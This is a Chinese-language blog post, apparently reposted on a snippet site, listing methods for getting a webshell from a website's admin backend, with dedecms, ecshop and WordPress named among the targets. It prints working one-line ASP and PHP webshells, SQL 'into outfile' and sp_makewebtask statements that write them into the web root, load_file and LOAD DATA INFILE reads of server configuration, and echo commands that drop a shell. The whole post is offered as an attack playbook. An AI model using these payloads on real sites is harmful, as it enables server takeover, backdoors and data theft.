网站后台getshell的方法总结(代码片段)

v01cano v01cano     2023-03-01     220

关键词:

网站后台getshell的方法总结

方法一:直接上传getshell

以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下:

技术分享图片

即可成功上传大马,并成功执行,从而拿下webshell。

坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用../跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名

技术分享图片

技术分享图片

方法二:数据库备份getshell

以南方数据cms为例:

1,首先上传一张图片马上去,并且获取图片马的路径

2,在系统管理处选择数据库备份,进行数据库备份getshell,具体操作方法如下:

技术分享图片

技术分享图片

技术分享图片

然后使用菜刀连接即可成功getshell。

当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库,比如通过新建管理员用户,将用户名用一句话木马代替(用户名通常有长度限制,在前端修改maxlength即可)

<%eval request ("pass")%>

然后再通过备份数据库getshell。

技术分享图片

方法三:修改网站上传类型配置拿webshell

有的网站在网站上传类型中限制了上传脚本类型文件,我们可以去添加上传文件类型,如添加asp|php|jsp|aspx|asa|cer等来拿webshell。

方法四:利用文件解析漏洞来拿webshell

记录在了这篇博客上面:https://www.cnblogs.com/v01cano/p/10326366.html

方法五:网站配置插马拿webshell:

注:asp中单引号表示单行注释作用

“%><%eval request("v01cano")%><%‘

一般先试试看该选项是否可以更改,如果可以更改,则插马试试,因为插马可能导致系统崩溃,所以一般需要首先需要本地搭建环境进行测试。

方法六:通过编辑器模板拿webshell

1,通过对网站的模板进行编辑写入一句话,然后生成脚本文件拿webshell。比如ecshop

2,通过将木马添加到压缩文件,把名字改为网站模板类型,上传到网站服务器,拿webshell。

技术分享图片

方法七:通过添加插件getshell

即利用网站管理员的添加插件功能getshell,将大马添加到插件的压缩包中,然后上传,从而getshell。比如wordpress,dz等等。

方法八:执行sql语句写入webshell

通过sql语句写入shell,首先执行错误的sql语句,使其暴露出网站的根目录:

select "<?php phpinfo();?>" into outfile "C:\\vulcms\\ecshopv3.6\\ecshop\\v01cano.php";

关于此语句说明,在windows中有时候需要使用斜杠/有时候需要使用双反斜杠末尾有时候需要分号,有时候也不需要分号。

以ecshop为例:

技术分享图片

也可以先将一句话通过新建管理员写入到user表中,然后通过数据库备份配合解析漏洞拿shell。

技术分享图片

方法九:通过数据库拿webshell

我们可以通过数据库执行命令导出一句话到网站根目录拿shell

access数据库导出一般需要利用解析漏洞xx.asp;.xml

sqlserver导出:

exec sp_makewebtask ‘C:	est1.php‘,‘ select ‘‘<%eval request("pass")%>‘‘ ‘--

mysql命令导出getshell:

方法1

 Create TABLE xiaoma (xiaoma1 text NOT NULL);
 Insert INTO xiaoma (xiaoma1) VALUES(‘<?php eval($_POST[xiaoma]);?>‘);
 select xiaoma1 from xiaoma into outfile ‘D:/phpstudy/www/7.php‘;
 Drop TABLE IF EXISTS xiaoma;

方法2

select "<?php eval($_POST[v01cano]);?>" into outfile ‘D:/phpstudy/www/a.php‘

方法3:方法1和方法2都是在网站根目录路径已知的时候写入shell,当数据库路径未知时,可以通过如下方法读取数据库路径:网站的根目录一般在网站配置文件httpd.conf中,而此目录的路径一般不变,一般在/apache/conf/httpd.conf中,(在phpmyadmin中的时候,我们可以选择变量选项观察其路径,进而推测httpd.conf的路径),在已知该文件路径的条件下,我们可以通过如下方法读取该文件中的内容:

//创建表a,并且将httpd.conf写入到表a中。
create table a(a text);load data infile "C:/phpStudy/Apache/conf/httpd.conf" into table a;

然后执行导出操作,将该文件下载,使用notepad++打开,最后搜索documentroot,即可找到网站的根目录:

技术分享图片

httpd.conf文件可能存在的一些路径:

linux中可能存在路径:

apache
/usr/local/mysql
/user/local/apache/conf/httpd.conf
/user/local/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf
/user/local/apache2/conf/httpd.conf

Nginx:

/user/local/nginx/conf/httpd.conf

方法四:直接通过load_file函数直接加载该文件内容

select load_file(‘C:/phpStudy/Apache/conf/httpd.conf‘);

但是需要在选项中进行如下配置才会显示出来:

技术分享图片

技术分享图片

方法n:还有通过日志拿shell的多种方式,已经记录在博客:

https://www.cnblogs.com/v01cano/p/10292670.html

方法十:通过文件包含拿webshell

先将webshell改为txt文件上传,然后上传一个脚本文件包含该txt文件,可以绕过waf拿webshell。

常用的文件包含方法如下:

asp包含:
1,<!--#include file="123.jpg"-->
2,调用的文件必须和被调用的文件在同一目录,否则找不到
3,如果不在同一目录,用下面语句也可以:
<!--#include virtual="文件所在目录/123.jpg"-->

php包含:
<?php
Include(‘123.jpg‘);
?>

方法十一:命令执行拿webshell

Echo ^<^?php @eval($_POST[v01cano]);?^>^ >c:1.php

^<^%eval request("cracer")%^>^ >c:1.php

十二:没有进入后台如下拿webshell

  • 0day拿webshell

  • IIS写权限拿webshell(put一个shell进去)

  • 命令执行拿webshell

  • 通过注入漏洞拿webshell

  • 前台图片上传拿webshell

  • Strusts2拿webshell

  • java反序列拿shell

[代码审计]beecms4.0漏洞总结(代码片段)

...管理功能存在文件上传和任意文件删除。找到后台之后的getshell思路:利用SQL注入伪造账号登录到后台,然后上传webshell。cms脉络程序目录结构把网站的目录和文件分为基础功能和用户功能两类,基础功能的主要:... 查看详情

网络安全一次实战中对tp5网站getshell方式的测试(代码片段)

前言之前接触tp5的站比较少,只知道利用RCE漏洞getshell的方式。在最近对一个发卡平台渗透的过程中,由于php版本限制,无法直接使用RCE的payload拿shell,于是结合该网站尽可能多的测试一下tp5+php7.1环境下的getshe... 查看详情

4w字+上千行代码!tomcat渗透测试方法大总结,拿来吧你!(代码片段)

...at远程代码执行(CVE-2019-0232)Tomcat弱口令&后台getshell漏洞TomcatmanagerApp暴力破解TomcatAJP文件包含漏洞分析(CVE-2020-1938)前言Tomcat服务器是一个免费 查看详情

后台以json数据形式返回之后前台接受的方法以及之后的解析总结(代码片段)

1、前台AJAX请求,后台以对象转JSON形式返回:后台代码:@RequestMapping(value="/queryDist",method=RequestMethod.POST)@ResponseBodypublicResultqueryDist(HttpServletRequestrequest)Booleanf=false;StringdevCode=request.getParame 查看详情

文件上传漏洞,解析漏洞总结(代码片段)

...制上传恶意代码并执行从而控制服务器。显然这种漏洞是getshell最快最直接的方法之一,需要说明的是上传文件操作本身是没有问题的,问题在于文件上传到服务器后,服务器怎么处理和解释文件 查看详情

从命令执行到getshell,适合新手学习(代码片段)

最近做项目遇到一个比较典型命令执行漏洞,适合新手学习,给大家分享下整个过程。从代码中可以看出来程序只使用trim()方法对jdk进行了两遍的空格过滤,然后直接和后面拼接的命令一起执行。接着来找一下这个方... 查看详情

图书管理系统(微信后台网页端)总结(代码片段)

Web课程技术总结网页前端基本框架vue1、值存储问题需要变更属性时(update),需要先获取属性(get),这里在返回时需要在服务端将值设为null,在更新时需要采用selective的方法,updateSelective()。放入session中的时候需要将password设为空... 查看详情

thinkphp5.0和5.1的getshell漏洞(代码片段)

...几天,应该不会有人故意为之,可能是批量扫描getshell的,为了方便我找的是开源系统thinkcmf建了博客,看着挺不错的,因为thinkcmf用的是thinkphp5.0的框架开发的,我到thinkphp.cn上去看了一下,原来有一个... 查看详情

网络安全渗透工程师面试题总结大全(代码片段)

...那么你怎么利用这个XSS?必须是selfxss+csrf+ssrf到getshel2.php的LFI,本地包含漏洞原理是什么?写一 查看详情

记一次简单的渗透测试(代码片段)

前言之前对渗透这方面的学习一直只是学到了Getshell为止,但是其实渗透可以说Getshell仅仅是一个开端,接下去的还有远程连接,域渗透等领域,这次刚好渗透到了某网站,决定以该网站为例,看看能不能... 查看详情

关于爬虫中几个常用库的使用方法总结(代码片段)

...的信息,只要求获取只个简单的字段即可。1.1爬取某知名网站的相关信息具体如下:(1)爬取某网的房源信息,包括“标题,位置, 查看详情

海量数据面试题(附题解+方法总结)(转)(代码片段)

...量数据中找出高频词?(百度)如何找出某一天访问百度网站最多的IP?(百度)如何在大量的数据中找出不重复的整数?(百度)如何在大量的数据中判断一个数是否存在?(腾讯)如何查询最热门的查询串?(腾讯)如何统... 查看详情

text阿拉伯语网站的css要点总结(代码片段)

查看详情

迭代器和生成器总结(代码片段)

...t、tuple等这类容器对象,使用for循环遍历是很方便的。在后台for语句对容器对象调用iter()函数,iter()是python的内置函数。iter()会返回一个定义了next()方法的迭代器对象,它在容器中逐个访问容器内元素,next()也是python的内置函数... 查看详情

如何修改wordpress网站默认登录地址wp-admin(代码片段)

使用过WordPress程序建网站的学员都知道,我们使用Wordpress建好的网站,它的网站登录后台就是“网站域名/wp-admin”。如下图:为了网站安全,如何修改Wordpress网站默认登录地址wp-admin呢?下面学做网站论坛介绍一下修改方法。方... 查看详情

linux后台服务架构高性能设计之道(代码片段)

...高并发、高可用、高可靠、可扩展、可维护、可用性等是后台开发耳熟能详的词了,它们中有些词在大部分情况下表达相近意思。本序列文章旨在探讨和总结后台架构设计中常用的技术和方法,并归纳成一套方法论。前... 查看详情

设计模式总结:模板方法(代码片段)

...流程的框架,在子类中实现具体的处理推荐访问我的个人网站,排版更好看呦:https://chenmingyu.top/design-template-method/什么是模板方法在父类(抽象类)中定义好算法的流程,提供抽象方法,针对不同的实现交由不同的子类去实现... 查看详情

渗透测试-cms网站数据库备份漏洞(代码片段)

...;解题方向进入后台,找到后台中可利用的地方getshell。攻击过程墨者学院在线靶机(动态地址):http://219.153.49.228:42047/御剑扫描后台老规矩,先上御剑扫描一波后台:找到后台登录地址http://219.153.49.2... 查看详情